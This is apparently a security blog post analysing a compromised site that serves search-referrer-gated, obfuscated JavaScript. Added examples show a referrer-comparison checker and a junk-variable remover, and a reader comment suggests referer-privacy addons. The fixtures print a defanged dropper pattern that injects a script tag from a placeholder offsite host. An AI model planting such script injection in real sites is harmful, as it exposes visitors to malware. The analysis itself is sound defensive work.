Malscript on Compromised Site

From the looks of it, the site appears to have been compromised in some way. There is obfuscated JavaScript buried in the webpage that points to a malicious domain. Thank goodness the malicious domain no longer resolves, so it’s not causing any harm. Let’s hope that the webmaster can quickly identify the cause and close the hole to prevent a re-hack.

Here’s a shot of their front page:

Like most campaigns we are seeing today, you need to arrive at the website via a search engine for the malicious script to activate; a direct visit gets the clean page. I searched for the site on Google and then clicked on the link (searching via Bing works too).
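The search-engine gating described above gives a webmaster a simple check: fetch the page once with no Referer and once with a search-engine Referer, then compare the external scripts. The following is an added example written for this post, not the site's or the attacker's code. The two HTML bodies are constructed stand-ins for those two fetches, and `www.example.com`, `cdn.example.com` and `injected-placeholder.invalid` are placeholder hostnames.

```javascript
// Added example (not from the post). Webmaster-side check for referrer-gated injection:
// fetch the same page with no Referer and with a search-engine Referer, then report any
// external <script src> that only appears in the search-referred copy.
// Every hostname below is a placeholder; the HTML bodies are constructed fixtures.

const SITE_HOST = "www.example.com"; // placeholder for the site's own host

// Referers the post says trigger the script (Google and Bing).
const SEARCH_REFERERS = ["https://www.google.com/", "https://www.bing.com/"];

// What a direct visit returns (constructed).
const DIRECT_HTML = `<html><head>
<script src="/js/site.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
</head><body>Welcome</body></html>`;

// What the same page returns when the Referer is a search engine (constructed):
// identical, plus one injected external script on a placeholder host.
const REFERRED_HTML = DIRECT_HTML.replace(
  "</head>",
  "<script type='text/javascript' src='http://injected-placeholder.invalid/t.js'></script></head>"
);

// Collect the src attribute of every <script> tag; quotes may be single or double.
function externalScriptSources(html) {
  const out = new Set();
  const re = /<script\b[^>]*\bsrc\s*=\s*(['"])(.*?)\1/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.add(m[2]);
  return out;
}

// Scripts present only in the search-referred copy are the referrer-gated ones.
function referrerOnlyScripts(directHtml, referredHtml) {
  const base = externalScriptSources(directHtml);
  return [...externalScriptSources(referredHtml)].filter((src) => !base.has(src));
}

// True when the script is served from a host other than the site's own.
function isOffsite(src, siteHost) {
  const host = new URL(src, `https://${siteHost}/`).hostname;
  return host !== siteHost;
}

// Attach an offsite flag to each referrer-gated script so a reviewer sees the odd one out.
function report(directHtml, referredHtml, siteHost) {
  return referrerOnlyScripts(directHtml, referredHtml).map((src) => ({
    src,
    offsite: isOffsite(src, siteHost),
  }));
}

// Live version for Node 18+ (not used by the offline demo): fetch the page directly and
// once per search-engine Referer. Browsers forbid setting Referer; Node's fetch does not.
async function referrerGatedScriptsLive(url, siteHost) {
  const direct = await (await fetch(url)).text();
  const findings = [];
  for (const referer of SEARCH_REFERERS) {
    const referred = await (await fetch(url, { headers: { Referer: referer } })).text();
    findings.push({ referer, scripts: report(direct, referred, siteHost) });
  }
  return findings;
}

console.log(report(DIRECT_HTML, REFERRED_HTML, SITE_HOST));
// → [ { src: 'http://injected-placeholder.invalid/t.js', offsite: true } ]
```

The same comparison can be done from a shell with `curl --referer 'https://www.google.com/' URL` against a plain `curl URL`; the point is that the page a crawler, an uptime monitor or the webmaster's own browser sees is not the page a search visitor sees, so a clean direct fetch proves nothing.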

And the malicious Javascript appears in the page:

The script has a lot of junk in there for misdirection. In fact, probably 60% of the code is just garbage. When analyzing this code, I noticed that the authors defined the variables for the legit code separately, so telling the good from the bad was actually very easy. Here’s the cleaned-up, valid code, which is now very easy to follow:

This script created the following:

<script type='text/javascript' src='hxxp://'></script>

Since the malicious site is down, I don’t know what it was doing. Perhaps rogueware or an exploit kit?
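The junk-variable misdirection described above is mechanical to strip once you treat it as dead code: a declaration that nothing else references, or that is referenced only by other dead declarations, can go. The following is an added example written for this post, not the author's own cleanup. `SAMPLE_OBFUSCATED` is a constructed fixture in the style the post describes; it is a string that is analysed, never executed, and its `src` value is a defanged placeholder.

```javascript
// Added example (not the post's own cleanup). First-pass removal of "junk" declarations:
// a variable is junk when no live statement other than its own declaration mentions it.
// The loop repeats so that junk which only feeds other junk (qx2 -> qx3) is removed too.
// SAMPLE_OBFUSCATED is a constructed fixture; it is never executed and its src is a placeholder.

const SAMPLE_OBFUSCATED = `
var qx1 = "semicolon; inside a string";
var qx2 = 31;
var qx3 = qx2 + 9; // junk that only feeds other junk
var s = document.createElement("script");
var zz = "more misdirection";
s.type = "text/javascript";
s.src = "hxxp://placeholder.invalid/t.js"; /* placeholder, defanged */
var qq = [1, 2, 3];
document.getElementsByTagName("head")[0].appendChild(s);
`;

// String literals (double, single, template) with escapes.
const STRING_RE = /"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'|`(?:\\.|[^`\\])*`/g;
// Same, plus block and line comments; the string alternative is captured so it can be kept.
const TOKEN_RE = /("(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'|`(?:\\.|[^`\\])*`)|\/\*[\s\S]*?\*\/|\/\/[^\n]*/g;

// Split into statements on ';'. One left-to-right pass drops comments and guards ';'
// inside strings so they do not split (a "//" inside a URL string is therefore safe).
// Limitation: a 'for (;;)' header is split too; fine for straight-line dropper code.
function splitStatements(src) {
  const guarded = src.replace(TOKEN_RE, (m, str) => (str ? str.replace(/;/g, "\u0001") : " "));
  return guarded
    .split(";")
    .map((st) => st.replace(/\u0001/g, ";").trim())
    .filter(Boolean);
}

// Identifiers mentioned by a statement, ignoring text inside string literals.
// Property names count as references too, which over-approximates liveness: a real
// variable is never dropped by mistake, at the cost of sometimes keeping junk.
function identifiersOf(stmt) {
  return new Set(stmt.replace(STRING_RE, '""').match(/[A-Za-z_$][\w$]*/g) || []);
}

function findJunkDeclarations(src) {
  const info = splitStatements(src).map((text) => {
    const m = /^(?:var|let|const)\s+([A-Za-z_$][\w$]*)/.exec(text);
    return { text, declares: m ? m[1] : null, refs: identifiersOf(text) };
  });
  const declared = new Set(info.filter((i) => i.declares).map((i) => i.declares));
  const dead = new Set();
  let changed = true;
  while (changed) {
    changed = false;
    for (const name of declared) {
      if (dead.has(name)) continue;
      // Live only if some statement that is neither dead nor its own declaration uses it.
      const live = info.some(
        (i) => i.declares !== name && !dead.has(i.declares) && i.refs.has(name)
      );
      if (!live) {
        dead.add(name);
        changed = true;
      }
    }
  }
  return {
    junk: [...dead].sort(),
    kept: info.filter((i) => !dead.has(i.declares)).map((i) => i.text),
  };
}

const result = findJunkDeclarations(SAMPLE_OBFUSCATED);
console.log("junk:", result.junk);
console.log("kept:\n" + result.kept.join(";\n") + ";");
```

What survives is exactly the four-statement dropper the post's cleaned-up code shows (create a script element, set its type and src, append it to head). This is a regex-level pass rather than a real parser, so it handles the straight-line style seen here and not loops or functions; for anything more involved, a JavaScript parser plus the same liveness loop over its AST is the right tool.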

  1. bastik says:

    Some users modify their referer to protect their privacy. At least with Firefox it’s possible through extensions like “Ref Control”, but some sites load images from domains which check the referer and serve the images only if you appear to visit the original site. (To prevent hotlinking, or to “protect” content)

    While a general referer policy should “protect” you, it can be a hassle to configure. There’s a Firefox addon which is easy to configure. “Search Engine Security” supports Google, Bing and Yahoo (at the time of writing). It changes the referer (can be configured globally only) when you click a link on such search engines (whitelist possible).

    A great article, which is the only reason I mention both addons here.

